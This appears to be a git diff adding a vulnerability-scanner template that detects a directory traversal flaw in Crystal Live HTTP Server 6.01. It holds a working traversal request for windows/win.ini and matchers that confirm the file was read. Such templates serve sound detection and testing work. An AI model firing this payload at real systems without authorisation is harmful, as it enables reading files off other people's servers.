commit
3c7f0847aa
|
@ -0,0 +1,22 @@
|
|||
id: crystal-live-server-lfi
|
||||
|
||||
info:
|
||||
name: Crystal Live HTTP Server 6.01 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
reference: https://cxsecurity.com/issue/WLB-2019110127
|
||||
tags: lfi,crystal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
Loading…
Reference in New Issue